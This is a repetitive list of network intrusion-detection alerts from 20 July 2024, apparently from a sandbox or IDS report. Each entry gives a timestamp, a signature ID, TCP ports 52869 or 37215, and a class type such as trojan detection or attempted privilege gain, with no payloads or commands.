                      Timestamp:07/20/24-23:06:05.412182
                      SID:2025132
                      Source Port:60988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.160489
                      SID:2027339
                      Source Port:56258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:42762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2835222
                      Source Port:48846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.083231
                      SID:2025132
                      Source Port:59958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:58368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.591367
                      SID:2025132
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.692242
                      SID:2025132
                      Source Port:56490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:51216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2027339
                      Source Port:53228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.938370
                      SID:2027339
                      Source Port:37092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2835222
                      Source Port:55362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.152056
                      SID:2831300
                      Source Port:58178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:49980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2027339
                      Source Port:51164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.763759
                      SID:2027339
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:60716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2831300
                      Source Port:58300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2831300
                      Source Port:41030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.874908
                      SID:2027339
                      Source Port:52612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.387385
                      SID:2027339
                      Source Port:39148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.570909
                      SID:2027339
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186863
                      SID:2027339
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.460786
                      SID:2025132
                      Source Port:54190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:35268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.469881
                      SID:2025132
                      Source Port:35628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.754581
                      SID:2027339
                      Source Port:55230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2831300
                      Source Port:34216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2027339
                      Source Port:40818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556916
                      SID:2027339
                      Source Port:59872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.272088
                      SID:2027339
                      Source Port:57650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.002942
                      SID:2025132
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.858951
                      SID:2025132
                      Source Port:42902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2027339
                      Source Port:60712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2027339
                      Source Port:36836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863826
                      SID:2829579
                      Source Port:47604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:48914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.610184
                      SID:2027339
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2831300
                      Source Port:57540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.320421
                      SID:2831300
                      Source Port:52392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2831300
                      Source Port:44366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.889934
                      SID:2027339
                      Source Port:48000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.789977
                      SID:2831300
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2829579
                      Source Port:57382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2829579
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.124441
                      SID:2025132
                      Source Port:55004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2025132
                      Source Port:56626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.336428
                      SID:2025132
                      Source Port:42884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2025132
                      Source Port:56634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2025132
                      Source Port:40168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.160208
                      SID:2027339
                      Source Port:39122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.210554
                      SID:2027339
                      Source Port:35222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2027339
                      Source Port:55320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2027339
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.014484
                      SID:2027339
                      Source Port:59816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.084046
                      SID:2025132
                      Source Port:60122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2025132
                      Source Port:33970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.573762
                      SID:2025132
                      Source Port:33212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.175839
                      SID:2025132
                      Source Port:60860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.309417
                      SID:2027339
                      Source Port:59684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.993987
                      SID:2027339
                      Source Port:56458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2027339
                      Source Port:42748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2027339
                      Source Port:36748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2025132
                      Source Port:50686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2027339
                      Source Port:44172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2025132
                      Source Port:47978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:37.923474
                      SID:2027339
                      Source Port:45400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.292919
                      SID:2025132
                      Source Port:57082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2831300
                      Source Port:35734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2025132
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:56324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2831300
                      Source Port:34352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402081
                      SID:2835222
                      Source Port:45950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.475273
                      SID:2027339
                      Source Port:53244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.256522
                      SID:2027339
                      Source Port:37820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2027339
                      Source Port:36806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2831300
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.668564
                      SID:2027339
                      Source Port:52158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.277784
                      SID:2027339
                      Source Port:34260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.090759
                      SID:2025132
                      Source Port:56366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:42528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662426
                      SID:2831300
                      Source Port:56560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.395125
                      SID:2027339
                      Source Port:58622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.492617
                      SID:2027339
                      Source Port:48244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.154823
                      SID:2025132
                      Source Port:57740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:39874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.614115
                      SID:2831300
                      Source Port:32886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.192675
                      SID:2831300
                      Source Port:37566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.226234
                      SID:2027339
                      Source Port:57676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.485916
                      SID:2027339
                      Source Port:55256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489811
                      SID:2831300
                      Source Port:38752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2027339
                      Source Port:57418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2027339
                      Source Port:46944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.535100
                      SID:2027339
                      Source Port:33614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.996045
                      SID:2025132
                      Source Port:43144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.467778
                      SID:2027339
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.390561
                      SID:2027339
                      Source Port:49480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2835222
                      Source Port:60030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2027339
                      Source Port:36462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2835222
                      Source Port:53364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2027339
                      Source Port:46842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2027339
                      Source Port:55838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.543371
                      SID:2027339
                      Source Port:49356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.791998
                      SID:2025132
                      Source Port:38314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.927905
                      SID:2027339
                      Source Port:33096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2027339
                      Source Port:41902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.051748
                      SID:2027339
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.133262
                      SID:2025132
                      Source Port:54676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.979529
                      SID:2025132
                      Source Port:55536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.479533
                      SID:2025132
                      Source Port:39002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2835222
                      Source Port:41080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.948391
                      SID:2025132
                      Source Port:59362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.338954
                      SID:2831300
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.487901
                      SID:2025132
                      Source Port:56144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2831300
                      Source Port:50042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.698080
                      SID:2831300
                      Source Port:36232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.132843
                      SID:2027339
                      Source Port:38484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.093469
                      SID:2831300
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2027339
                      Source Port:40220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2025132
                      Source Port:54064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2027339
                      Source Port:43112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2835222
                      Source Port:47038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:53260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.171950
                      SID:2027339
                      Source Port:55226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2027339
                      Source Port:40122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:33694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2027339
                      Source Port:38090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2025132
                      Source Port:57030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.181822
                      SID:2027339
                      Source Port:43348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.416273
                      SID:2831300
                      Source Port:58618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.422006
                      SID:2831300
                      Source Port:50720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.388862
                      SID:2027339
                      Source Port:59500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:41858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.290290
                      SID:2027339
                      Source Port:47628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.265746
                      SID:2025132
                      Source Port:40496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2831300
                      Source Port:41682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2027339
                      Source Port:57542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2027339
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:44942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:45352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2027339
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:53174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2829579
                      Source Port:45274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.945161
                      SID:2025132
                      Source Port:41086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.216313
                      SID:2025132
                      Source Port:57988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.564435
                      SID:2025132
                      Source Port:46272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2829579
                      Source Port:57274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:39280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2829579
                      Source Port:59144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2025132
                      Source Port:32832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2025132
                      Source Port:36444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2831300
                      Source Port:53636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2831300
                      Source Port:44490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2835222
                      Source Port:32850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2027339
                      Source Port:35170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.963469
                      SID:2027339
                      Source Port:58470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:42684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2829579
                      Source Port:60236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2831300
                      Source Port:45050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:45732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2831300
                      Source Port:36898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:34316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2027339
                      Source Port:58640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2027339
                      Source Port:50722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.486669
                      SID:2025132
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.435643
                      SID:2831300
                      Source Port:52354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.311372
                      SID:2835222
                      Source Port:39040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.885283
                      SID:2027339
                      Source Port:53494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2027339
                      Source Port:45000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:51092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:43894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2027339
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2831300
                      Source Port:57878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.559388
                      SID:2027339
                      Source Port:37594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.360019
                      SID:2025132
                      Source Port:47744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.237125
                      SID:2025132
                      Source Port:34782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.138503
                      SID:2025132
                      Source Port:54248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.955933
                      SID:2027339
                      Source Port:37982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.230515
                      SID:2027339
                      Source Port:41586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
